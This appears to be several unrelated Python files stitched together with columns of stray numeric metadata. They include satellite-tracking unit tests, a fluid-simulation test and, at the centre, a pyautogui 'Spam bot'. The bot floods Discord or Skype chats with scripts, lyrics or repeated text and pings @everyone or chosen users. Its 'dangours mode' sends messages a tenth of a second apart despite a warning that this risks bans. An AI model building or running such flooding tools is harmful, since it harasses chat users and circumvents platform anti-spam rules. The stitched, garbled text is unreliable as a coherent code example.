obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch.object(Connection,
'communicate',
return_value=(True, ['E', 2, 3, 4], 4)):
suc = sat.setTrackingOffsets(RA=1, DEC=1, DECcorr=1, Time=1)
self.assertFalse(suc)
def test_setTrackingOffsets_5(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch.object(Connection,
'communicate',
return_value=(True, [1, 2, 3, 4], 4)):
suc = sat.setTrackingOffsets(RA=1, DEC=1, DECcorr=1, Time=1)
self.assertTrue(suc)
def test_addTrackingOffsets_1(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch.object(Connection,
'communicate',
return_value=(False, [1, 2, 3, 4], 4)):
suc = sat.addTrackingOffsets(RA=1, DEC=1, DECcorr=1, Time=1)
self.assertFalse(suc)
def test_addTrackingOffsets_2(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch.object(Connection,
'communicate',
return_value=(True, [1, 2, 3, 4], 1)):
suc = sat.addTrackingOffsets(RA=1, DEC=1, DECcorr=1, Time=1)
self.assertFalse(suc)
def test_addTrackingOffsets_3(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch.object(Connection,
'communicate',
return_value=(True, ['E', 2, 3], 3)):
suc = sat.addTrackingOffsets(RA=1, DEC=1, DECcorr=1, Time=1)
self.assertFalse(suc)
def test_addTrackingOffsets_4(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch.object(Connection,
'communicate',
return_value=(True, ['E', 2, 3, 4], 4)):
suc = sat.addTrackingOffsets(RA=1, DEC=1, DECcorr=1, Time=1)
self.assertFalse(suc)
def test_addTrackingOffsets_5(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch.object(Connection,
'communicate',
return_value=(True, [1, 2, 3, 4], 4)):
suc = sat.addTrackingOffsets(RA=1, DEC=1, DECcorr=1, Time=1)
self.assertTrue(suc)
def test_clearTrackingOffsets_1(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch.object(Connection,
'communicate',
return_value=(False, [1, 2, 3, 4], 4)):
suc = sat.clearTrackingOffsets()
self.assertFalse(suc)
def test_clearTrackingOffsets_2(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch.object(Connection,
'communicate',
return_value=(True, [1], 4)):
suc = sat.clearTrackingOffsets()
self.assertFalse(suc)
def test_clearTrackingOffsets_3(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch.object(Connection,
'communicate',
return_value=(True, ['E', 'E'], 2)):
suc = sat.clearTrackingOffsets()
self.assertFalse(suc)
def test_clearTrackingOffsets_4(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch.object(Connection,
'communicate',
return_value=(True, ['E'], 1)):
suc = sat.clearTrackingOffsets()
self.assertFalse(suc)
def test_clearTrackingOffsets_5(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch.object(Connection,
'communicate',
return_value=(True, ['V'], 1)):
suc = sat.clearTrackingOffsets()
self.assertTrue(suc)
| 28.603731
| 86
| 0.524862
| 5,098
| 50,600
| 5.136524
| 0.039427
| 0.033415
| 0.057855
| 0.087069
| 0.936684
| 0.874589
| 0.854502
| 0.847132
| 0.833652
| 0.808676
| 0
| 0.078202
| 0.370237
| 50,600
| 1,768
| 87
| 28.61991
| 0.743551
| 0.006186
| 0
| 0.819465
| 0
| 0
| 0.076619
| 0.021734
| 0
| 0
| 0
| 0
| 0.105498
| 1
| 0.093611
| false
| 0.000743
| 0.004458
| 0
| 0.238484
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6174abac7c9c3ceea0898728d3c1ea4d5ac1804e
| 71
|
py
|
Python
|
tests/errors-test/cases/duplicate-function.py
|
jaydeetay/pxt
|
aad1beaf15edc46e1327806367298cbc942dcbc1
|
[
"MIT"
] | 977
|
2019-05-06T23:12:55.000Z
|
2022-03-29T19:11:44.000Z
|
tests/errors-test/cases/duplicate-function.py
|
jaydeetay/pxt
|
aad1beaf15edc46e1327806367298cbc942dcbc1
|
[
"MIT"
] | 3,980
|
2019-05-09T20:48:14.000Z
|
2022-03-28T20:33:07.000Z
|
tests/errors-test/cases/duplicate-function.py
|
jaydeetay/pxt
|
aad1beaf15edc46e1327806367298cbc942dcbc1
|
[
"MIT"
] | 306
|
2016-04-09T05:28:07.000Z
|
2019-05-02T14:23:29.000Z
|
def helper():
pass
def helper(): # TS9520 duplicate func
pass
| 11.833333
| 37
| 0.633803
| 9
| 71
| 5
| 0.666667
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.076923
| 0.267606
| 71
| 5
| 38
| 14.2
| 0.788462
| 0.295775
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
61beafe8bb0a1a04e7bfaa2eca8000b5e7382f67
| 28,819
|
py
|
Python
|
main.py
|
StanislavParovoy/spam
|
93adebc70c0e38bdceaba7a0d133affd5214bd20
|
[
"MIT"
] | null | null | null |
main.py
|
StanislavParovoy/spam
|
93adebc70c0e38bdceaba7a0d133affd5214bd20
|
[
"MIT"
] | null | null | null |
main.py
|
StanislavParovoy/spam
|
93adebc70c0e38bdceaba7a0d133affd5214bd20
|
[
"MIT"
] | null | null | null |
try:
import pyautogui, time, os, webbrowser
from os import system, name
import sys
print('All required packages have been found!')
time.sleep(1)
except:
try:
os.system('pip install pyautogui')
print('All packages have been installed!')
time.sleep(1)
except:
print('Cannot Install packages!')
exit()
def clear():
if os.name == 'nt':
_ = system('cls')
else:
_ = system('clear')
clear()
screenWidth, screenHeight = pyautogui.size()
#replace all '" in files
print("!I AM NOT RESPONSIBLE FOR ANY BAN'S YOU GET!")
print('Only for discord users!')
print('Activate Annoying mode!')
print('You must have the required @everyone and @here permission to do it!')
print('annoy mode doesn"t work at the moment!')
annoying = input('Y/N ')
if annoying.upper() == 'Y':
print('1. @everyone')
print('2. @here')
print('3. [discord tag]')
who_annoy = int(input('Select option: '))
annoy = ''
if who_annoy == 1:
annoy == '@everyone'
elif who_annoy == 2:
annoy == '@here'
elif who_annoy == 3:
tag = input('Discord Tag: ')
tag1 = '@'+tag
annoy = tag1
while True:
print('')
print('')
print('Spam bot!')
print('')
print('')
time.sleep(1)
print('1. Bee movie Script')
time.sleep(1)
print('2. Shrek scripts')
time.sleep(1)
print('3. Wiki pages!')
time.sleep(1)
print('4. Song Scripts')
time.sleep(1)
print('5. Inputted Text Repeated')
time.sleep(1)
print('6. Change Annoy Target')
time.sleep(1)
print('7. Info')
time.sleep(1)
print('8. Exit/leave mode')#poggers1337
time.sleep(1)
i = int(input('Select option: '))
if i == 1:
print('1. Bee movie Script Selected!')
print(
'...........................................................................................................................')
print('')
print('Leave this running on a Text chat like discord or skype!')
print('You must have the the flashing | otherwise it will put the text in where it has been selected!')
time.sleep(1)
print('')
print('5 seconds before start!')
time.sleep(5)
f = open("Scripts/beemovie.txt", 'r')
for word in f:
pyautogui.press("shift" + "enter")
pyautogui.typewrite(word)
pyautogui.typewrite(' ')
pyautogui.typewrite(annoy)
time.sleep(.1)
pyautogui.press("enter")
print('completed!')
elif i == 2:
print('2. Shrek Scripts Selected!')#poggers1337
print(
'...........................................................................................................................')
print('')
print('1. Shrek 1')
time.sleep(1)
print('2. Shrek 2')
time.sleep(1)
print('3. Shrek 3')
time.sleep(1)
print('4. Shrek 4')
time.sleep(1)
script_choice_shrek = int(input('Select option: '))
if script_choice_shrek == 1:
time.sleep(1)
print('Shrek 1 Selected!')
time.sleep(1)
print('Leave this running on a Text chat like discord or skype!')
print('You must have the the flashing | otherwise it will put the text in where it has been selected!')
time.sleep(1)
print('')
print('5 seconds before start!')
time.sleep(5)
f = open("Scripts/Shrek/shrek_1.txt", 'r')
for word in f:
pyautogui.typewrite(word)
pyautogui.typewrite(' ')
pyautogui.typewrite(annoy)
time.sleep(.1)
pyautogui.press("enter")
print('Completed!')
elif script_choice_shrek == 2:
time.sleep(1)
print('Shrek 2 Selected!')#poggers1337
time.sleep(1)
print('Leave this running on a Text chat like discord or skype!')
print('You must have the the flashing | otherwise it will put the text in where it has been selected!')
time.sleep(1)
print('')
print('5 seconds before start!')
time.sleep(5)
f = open("Scripts/Shrek/shrek_2.txt", 'r')
for word in f:
pyautogui.typewrite(word)
pyautogui.typewrite(' ')
pyautogui.typewrite(annoy)
time.sleep(.1)
pyautogui.press("enter")
print('Completed!')
elif script_choice_shrek == 3:
time.sleep(1)
print('Shrek 3 Selected!')
time.sleep(1)
print('Leave this running on a Text chat like discord or skype!')
print('You must have the the flashing | otherwise it will put the text in where it has been selected!')
time.sleep(1)
print('')
print('5 seconds before start!')
time.sleep(5)
f = open("Scripts/Shrek/shrek_3.txt", 'r')
for word in f:
pyautogui.typewrite(word)
pyautogui.typewrite(' ')
pyautogui.typewrite(annoy)
time.sleep(.1)
pyautogui.press("enter")
print('Completed!')
elif script_choice_shrek == 4:
time.sleep(1)
print('Shrek 4 Selected!')#poggers1337
time.sleep(1)
print('Shrek 4 has no public script, returning!')
else:
print('Invalid Choice!')
elif i == 3:
print('3. Wiki Pages Selected!')
print(
'...........................................................................................................................')
print('')
time.sleep(1)
print("These Wikipedia Scripts are the Base of all of them and more will be added!")
time.sleep(1)
print('DM me if you want to add more. Go to info for contacts!')
print('Or you could make a push on Github!')
time.sleep(2)
print("1. Wikipedia script")
time.sleep(1)
print("2. Cheese")
time.sleep(1)
wiki_selection = int(input('Select Option: '))
if wiki_selection == 1:
print('Cheese Selected!')
time.sleep(1)
print('Leave this running on a Text chat like discord or skype!')
print('You must have the the flashing | otherwise it will put the text in where it has been selected!')
time.sleep(1)
print('')
print('5 seconds before start!')
time.sleep(5)
f = open("Scripts/Wiki/Wikipedia.txt", 'r', encoding="utf8")
for word in f:
pyautogui.press("shift" + "enter")
pyautogui.typewrite(word)
pyautogui.typewrite(' ')
pyautogui.typewrite(annoy)
time.sleep(.1)
pyautogui.press("enter")
print('Completed!')
elif i == 4:#poggers1337
print('4. Song scripts selected!')
print(
'...........................................................................................................................')
print('')
time.sleep(1)
print("These Song Scripts are the Base of all of them and more will be added!")
time.sleep(1)
print('DM me if you want to add more. Go to info for contacts!')
print('Or you could make a push on Github!')
time.sleep(1)
print('1. Rick Roll')
time.sleep(1)
print('2. Dat Boi Sus')
time.sleep(1)
print('3. Wap')
time.sleep(1)
print('4. Black Beatles')
time.sleep(1)
song_selection = int(input('Select option: '))
if song_selection == 1:
print('1. Rick Roll Selected')
time.sleep(1)
print('Starting in 5 seconds')
time.sleep(5)
f = open("Scripts/songs/rick_roll.txt", 'r', encoding="utf8")
for word in f:
pyautogui.press("shift" + "enter")
pyautogui.typewrite(word)
pyautogui.typewrite(' ')
pyautogui.typewrite(annoy)
time.sleep(1)
pyautogui.press("enter")
print('Completed!')
elif song_selection == 2:
print('2. Dat Boi Sus Selected')
time.sleep(1)
print('Starting in 5 seconds')
time.sleep(5)
f = open("Scripts/songs/hatchback.txt", 'r', encoding="utf8")
for word in f:
pyautogui.press("shift" + "enter")
pyautogui.typewrite(word)
pyautogui.typewrite(' ')
pyautogui.typewrite(annoy)
time.sleep(1)
pyautogui.press("enter")
elif song_selection == 3:
print('3. Wap Selected')
time.sleep(1)
print('Starting in 5 seconds')
time.sleep(5)
f = open("Scripts/songs/wap.txt", 'r', encoding="utf8")
for word in f:
pyautogui.press("shift" + "enter")
pyautogui.typewrite(word)
pyautogui.typewrite(' ')#poggers1337
pyautogui.typewrite(annoy)
time.sleep(1)
pyautogui.press("enter")
elif song_selection == 4:
print('4. Black Beatles Selected')
time.sleep(1)
print('Starting in 5 seconds')
time.sleep(5)
f = open("Scripts/songs/blackbeatles.txt", 'r', encoding="utf8")
for word in f:
pyautogui.press("shift" + "enter")
pyautogui.typewrite(word)
pyautogui.typewrite(' ')
pyautogui.typewrite(annoy)
time.sleep(1)
pyautogui.press("enter")
else:
print('Invaild option!')
elif i == 5:
print('5. Inputted Text Repeted Selected!')
print(
'...........................................................................................................................')
print('')
time.sleep(1)
print('Sending messages below 1.5 seconds on discord Can get you banned!')
time.sleep(1)
dangours_mode = input('Would you like to activate dangours mode? Y/N ')
if dangours_mode.upper() == 'Y':
time.sleep(1)
repeat_times = int(input("How many messgaes: "))
if repeat_times <= 1:
print('Invalid answer, It has to be a whole number!')
time.sleep(1)
message = input('Message: ')
time.sleep(5)
for _ in range(repeat_times):
pyautogui.press("shift" + "enter")
pyautogui.typewrite(message)#poggers1337
pyautogui.typewrite(' ')
pyautogui.typewrite(annoy)
time.sleep(0.1)
pyautogui.press("enter")
print('Completed!')
pyautogui.typewrite('Completed!')
wait_before_r = int(input("Time before next Message Sent: "))
if wait_before_r <= 1.5:
print('I AM NOT RESPONSIBLE FOR YOU GETTING BANNED!')
time.sleep(1)
repeat_times = int(input("How many messgaes: "))
if repeat_times <= 1:
print('Invalid answer, It has to be a whole number!')
time.sleep(1)
message = input('Message: ')
time.sleep(5
)
for _ in range(repeat_times):
pyautogui.press("shift" + "enter")
pyautogui.typewrite(message)
pyautogui.typewrite(' ')
pyautogui.typewrite(annoy)
time.sleep(wait_before_r)
pyautogui.press("enter")
print('Completed!')
pyautogui.typewrite('Completed!')
elif i == 6:
print('6. Change Annoy Target Selected!')
print('...........................................................................................................................')
print('')
print('1. @everyone')
print('2. @here')
print('3. [discord tag]')
who_annoy = int(input('Select option: '))
annoy = ''
if who_annoy == 1:
annoy == '@everyone'
elif who_annoy == 2:
annoy == '@here'
elif who_annoy == 3:
tag = input('Discord Tag: ')
tag1 = '@' + tag
annoy = tag1
elif i == 7:
print('6. Info Selected!')
print(
'...........................................................................................................................')
time.sleep(1)
print('Built by sɹǝƃƃod#5183')
time.sleep(1)
print('Copyright 2020 sɹǝƃƃod#5183/poggers1337')#poggers1337
print(
'Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:')
print(
'The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.')
print(
'THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.')
time.sleep(5)
discord_server = input('Would you like to join my discord server for more software? Y/N ')
if discord_server.upper() == 'Y':
webbrowser.open_new(url='https://discord.gg/FuBjvyR')
support = input('Would you like to support me, This is open source and I dont get anything off it! Y/N ')
if support.upper() == 'Y':
webbrowser.open(url='paypal.me/james1collum', new=1)
elif i == 8:
print('1. Change to normal')
time.sleep(1)
print('2. Exit')
exit_change_mode = int(input('Select option: '))
if exit_change_mode == 1:
break
elif exit_change_mode == 2:
print('Exitting')
time.sleep(1)
exit()
else:#poggers1337
print('Invalid answer!')
while True:
clear()
print('')
print('')
print('Spam bot!')
print('')
print('')
time.sleep(1)
print('1. Bee movie Script')
time.sleep(1)
print('2. Shrek scripts')
time.sleep(1)
print('3. Wiki pages!')
time.sleep(1)
print('4. Song Scripts')#poggers1337
time.sleep(1)
print('5. Inputted Text Repeated')
time.sleep(1)
print('6. Info')
time.sleep(1)
print('7. Exit')
time.sleep(1)
i = int(input('Select option: '))
if i == 1:
print('1. Bee movie Script Selected!')
print('...........................................................................................................................')
print('')
print('Leave this running on a Text chat like discord or skype!')
print('You must have the the flashing | otherwise it will put the text in where it has been selected!')
time.sleep(1)#poggers1337
print('')
print('5 seconds before start!')
time.sleep(5)
f = open("Scripts/beemovie.txt", 'r')
for word in f:
pyautogui.press("shift"+"enter")
pyautogui.typewrite(word)
time.sleep(.1)
pyautogui.press("enter")
print('completed!')
elif i == 2:
print('2. Shrek Scripts Selected!')
print(
'...........................................................................................................................')
print('')
print('1. Shrek 1')#poggers1337
time.sleep(1)
print('2. Shrek 2')
time.sleep(1)
print('3. Shrek 3')
time.sleep(1)
print('4. Shrek 4')
time.sleep(1)
script_choice_shrek = int(input('Select option: '))
if script_choice_shrek == 1:
time.sleep(1)
print('Shrek 1 Selected!')
time.sleep(1)
print('Leave this running on a Text chat like discord or skype!')
print('You must have the the flashing | otherwise it will put the text in where it has been selected!')
time.sleep(1)
print('')#poggers1337
print('5 seconds before start!')
time.sleep(5)
f = open("Scripts/Shrek/shrek_1.txt", 'r')
for word in f:
pyautogui.typewrite(word)
time.sleep(.1)
pyautogui.press("enter")
print('Completed!')
elif script_choice_shrek == 2:
time.sleep(1)
print('Shrek 2 Selected!')
time.sleep(1)
print('Leave this running on a Text chat like discord or skype!')
print('You must have the the flashing | otherwise it will put the text in where it has been selected!')
time.sleep(1)
print('')
print('5 seconds before start!')
time.sleep(5)
f = open("Scripts/Shrek/shrek_2.txt", 'r')
for word in f:
pyautogui.typewrite(word)#poggers1337
time.sleep(.1)
pyautogui.press("enter")
print('Completed!')
elif script_choice_shrek == 3:
time.sleep(1)
print('Shrek 3 Selected!')
time.sleep(1)
print('Leave this running on a Text chat like discord or skype!')
print('You must have the the flashing | otherwise it will put the text in where it has been selected!')
time.sleep(1)
print('')
print('5 seconds before start!')
time.sleep(5)
f = open("Scripts/Shrek/shrek_3.txt", 'r')
for word in f:
pyautogui.typewrite(word)
time.sleep(.1)#poggers1337
pyautogui.press("enter")
print('Completed!')
elif script_choice_shrek == 4:
time.sleep(1)
print('Shrek 4 Selected!')
time.sleep(1)
print('Shrek 4 has no public script, returning!')
else:
print('Invalid Choice!')
elif i == 3:
print('3. Wiki Pages Selected!')
print(
'...........................................................................................................................')
print('')
time.sleep(1)#poggers1337
print("These Wikipedia Scripts are the Base of all of them and more will be added!")
time.sleep(1)
print('DM me if you want to add more. Go to info for contacts!')
print('Or you could make a push on Github!')
time.sleep(2)
print("1. Wikipedia script")
time.sleep(1)
print("2. Cheese")
time.sleep(1)
wiki_selection = int(input('Select Option: '))
if wiki_selection == 1:
print('Wikipedia Selected!')
time.sleep(1)
print('Leave this running on a Text chat like discord or skype!')
print('You must have the the flashing | otherwise it will put the text in where it has been selected!')
time.sleep(1)#poggers1337
print('')
print('5 seconds before start!')
time.sleep(5)
f = open("Scripts/Wiki/Wikipedia.txt", 'r', encoding="utf8")
for word in f:
pyautogui.press("shift"+"enter")
pyautogui.typewrite(word)
time.sleep(1)
pyautogui.press("enter")
print('Completed!')
elif wiki_selection == 2:
print('Cheese Selected!')
time.sleep(1)
print('Leave this running on a Text chat like discord or skype!')
print('You must have the the flashing | otherwise it will put the text in where it has been selected!')
time.sleep(1)
print('')
print('5 seconds before start!')
time.sleep(5)
f = open("Scripts/Wiki/cheese.txt", 'r', encoding="utf8")
for word in f:#poggers1337
pyautogui.press("shift" + "enter")
pyautogui.typewrite(word)
time.sleep(1)
pyautogui.press("enter")
print('Completed!')
elif i == 4:
print('4. Song scripts selected!')
print(
'...........................................................................................................................')
print('')
time.sleep(1)
print("These Song Scripts are the Base of all of them and more will be added!")
time.sleep(1)
print('DM me if you want to add more. Go to info for contacts!')
print('Or you could make a push on Github!')
time.sleep(1)#poggers1337
print('1. Rick Roll')
time.sleep(1)
print('2. Dat Boi Sus')
time.sleep(1)
print('3. Wap')
time.sleep(1)
print('4. Black Beatles')
time.sleep(1)
song_selection = int(input('Select option: '))
if song_selection == 1:
print('1. Rick Roll Selected')
time.sleep(1)
print('Starting in 5 seconds')
time.sleep(5)
f = open("Scripts/songs/rick_roll.txt", 'r', encoding="utf8")
for word in f:
pyautogui.press("shift" + "enter")
pyautogui.typewrite(word)
time.sleep(1)#poggers1337
pyautogui.press("enter")
print('Completed!')
elif song_selection == 2:
print('2. Dat Boi Sus Selected')
time.sleep(1)
print('Starting in 5 seconds')
time.sleep(5)
f = open("Scripts/songs/hatchback.txt", 'r', encoding="utf8")
for word in f:
pyautogui.press("shift" + "enter")
pyautogui.typewrite(word)
time.sleep(1)
pyautogui.press("enter")
elif song_selection == 3:
print('3. Wap Selected')
time.sleep(1)
print('Starting in 5 seconds')
time.sleep(5)#poggers1337
f = open("Scripts/songs/wap.txt", 'r', encoding="utf8")
for word in f:
pyautogui.press("shift" + "enter")
pyautogui.typewrite(word)
time.sleep(1)
pyautogui.press("enter")
elif song_selection == 4:
print('4. Black Beatles Selected')
time.sleep(1)
print('Starting in 5 seconds')
time.sleep(5)
f = open("Scripts/songs/blackbeatles.txt", 'r', encoding="utf8")
for word in f:
pyautogui.press("shift" + "enter")
pyautogui.typewrite(word)
time.sleep(1)
pyautogui.press("enter")
#poggers1337
else:
print('Invaild option!')
elif i == 5:
print('5. Inputted Text Repeted Selected!')
print(
'...........................................................................................................................')
print('')
time.sleep(1)
print('Sending messages below 1.5 seconds on discord Can get you banned!')
time.sleep(1)
dangours_mode = input('Would you like to activate dangours mode? Y/N ')
if dangours_mode.upper() == 'Y':
time.sleep(1)
repeat_times = int(input("How many messgaes: "))
if repeat_times <= 1:
print('Invalid answer, It has to be a whole number!')
time.sleep(1)
message = input('Message: ')#poggers1337
time.sleep(5)
for _ in range(repeat_times):
pyautogui.press("shift" + "enter")
pyautogui.typewrite(message)
time.sleep(0.1)
pyautogui.press("enter")
print('Completed!')
pyautogui.typewrite('Completed!')
wait_before_r = int(input("Time before next Message Sent: "))
if wait_before_r <= 1.5:
print('I AM NOT RESPONSIBLE FOR YOU GETTING BANNED!')
time.sleep(1)
repeat_times = int(input("How many messgaes: "))
if repeat_times <= 1:
print('Invalid answer, It has to be a whole number!')
time.sleep(1)
message = input('Message: ')
time.sleep(5
)
for _ in range(repeat_times):#poggers1337
pyautogui.press("shift" + "enter")
pyautogui.typewrite(message)
time.sleep(wait_before_r)
pyautogui.press("enter")
print('Completed!')
pyautogui.typewrite('Completed!')
elif i == 6:
print('6. Info Selected!')
print('...........................................................................................................................')
time.sleep(1)
print('Built by sɹǝƃƃod#5183')
time.sleep(1)
print('Copyright 2020 sɹǝƃƃod#5183/poggers1337')
print('Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:')
print('The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.')
print('THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.')
time.sleep(5)
discord_server = input('Would you like to join my discord server for more software? Y/N ')
if discord_server.upper() == 'Y':
webbrowser.open_new(url= 'https://discord.gg/FuBjvyR')
support = input('Would you like to support me, This is open source and I dont get anything off it! Y/N ')
if support.upper() == 'Y':
webbrowser.open(url='paypal.me/james1collum')#poggers1337
elif i == 7:
print('End')
break
exit()
#poggers1337
| 42.194729
| 479
| 0.488775
| 3,116
| 28,819
| 4.48941
| 0.094673
| 0.099721
| 0.088641
| 0.085782
| 0.937665
| 0.922796
| 0.916291
| 0.908857
| 0.906998
| 0.903496
| 0
| 0.025205
| 0.352962
| 28,819
| 683
| 480
| 42.194729
| 0.724996
| 0.010722
| 0
| 0.928025
| 0
| 0.012251
| 0.371331
| 0.074638
| 0
| 0
| 0
| 0
| 0
| 1
| 0.001531
| false
| 0
| 0.004594
| 0
| 0.006126
| 0.344564
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
61c36917720aaef146bc0e59bd823333cd046fd1
| 173
|
py
|
Python
|
keep_alive.py
|
krkunal/CarND-Behavioral-Cloning-P3
|
dba13041b83629f36832efdca8be6949d26642f6
|
[
"MIT"
] | null | null | null |
keep_alive.py
|
krkunal/CarND-Behavioral-Cloning-P3
|
dba13041b83629f36832efdca8be6949d26642f6
|
[
"MIT"
] | null | null | null |
keep_alive.py
|
krkunal/CarND-Behavioral-Cloning-P3
|
dba13041b83629f36832efdca8be6949d26642f6
|
[
"MIT"
] | null | null | null |
#! /bin/python3
import os
import subprocess
# do long-running work here
os.system("term1-simulator-linux/beta_simulator_linux/beta_simulator.x86_64")
print("hello")
| 21.625
| 77
| 0.763006
| 25
| 173
| 5.12
| 0.76
| 0.21875
| 0.28125
| 0.421875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.039474
| 0.121387
| 173
| 8
| 78
| 21.625
| 0.802632
| 0.231214
| 0
| 0
| 0
| 0
| 0.539063
| 0.5
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.25
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
4ee272e07a11b7fc4c9fe816675e0dae21a424d2
| 2,293
|
py
|
Python
|
tests/test_conservation_mass_2d.py
|
firedrakeproject/flooddrake
|
4a78c426a7171a27d02f864ee8e9d7b324163116
|
[
"MIT"
] | 6
|
2018-07-27T04:09:53.000Z
|
2022-03-07T21:19:43.000Z
|
tests/test_conservation_mass_2d.py
|
firedrakeproject/flooddrake
|
4a78c426a7171a27d02f864ee8e9d7b324163116
|
[
"MIT"
] | 19
|
2016-06-14T09:13:01.000Z
|
2021-05-20T08:40:55.000Z
|
tests/test_conservation_mass_2d.py
|
firedrakeproject/flooddrake
|
4a78c426a7171a27d02f864ee8e9d7b324163116
|
[
"MIT"
] | 4
|
2016-06-09T10:09:28.000Z
|
2022-03-07T21:19:43.000Z
|
""" test conservation of mass in 2d dam break problem """
from __future__ import division
import numpy as np
from firedrake import *
from flooddrake import *
def test_conservation_mass_2d_flat_source():
n = 5
mesh = UnitSquareMesh(n, n)
# mixed function space
v_h = FunctionSpace(mesh, "DG", 1)
v_mu = FunctionSpace(mesh, "DG", 1)
v_mv = FunctionSpace(mesh, "DG", 1)
V = v_h * v_mu * v_mv
# setup free surface depth
g = Function(V)
g.sub(0).assign(0.8)
# setup bed
bed = Function(V)
# setup state
state = State(V, g, bed)
# source term
source = Function(v_h)
w_start = Function(V).assign(state.w)
# timestep
t_end = 0.01
solution = Timestepper(V, state.bed, source, 0.025)
w_end = solution.stepper(0, t_end, state.w, 0.025)
h_start, mu_start, mv_start = split(w_start)
h_end, mu_end, mv_end = split(w_end)
depth_start = Function(v_h).project(h_start)
depth_end = Function(v_h).project(h_end)
mass_diff = np.abs(assemble(depth_start * dx) - assemble(depth_end * dx))
assert mass_diff <= 1e-4
def test_conservation_mass_2d_unflat_source():
n = 5
mesh = UnitSquareMesh(n, n)
# mixed function space
v_h = FunctionSpace(mesh, "DG", 1)
v_mu = FunctionSpace(mesh, "DG", 1)
v_mv = FunctionSpace(mesh, "DG", 1)
V = v_h * v_mu * v_mv
# setup free surface depth
g = Function(V)
x = SpatialCoordinate(V.mesh())
g.sub(0).interpolate(conditional(
pow(x[0] - 0.5, 2) + pow(x[1] - 0.5, 2) < 0.05, 1.0, 0.8))
# setup bed
bed = Function(V)
# setup state
state = State(V, g, bed)
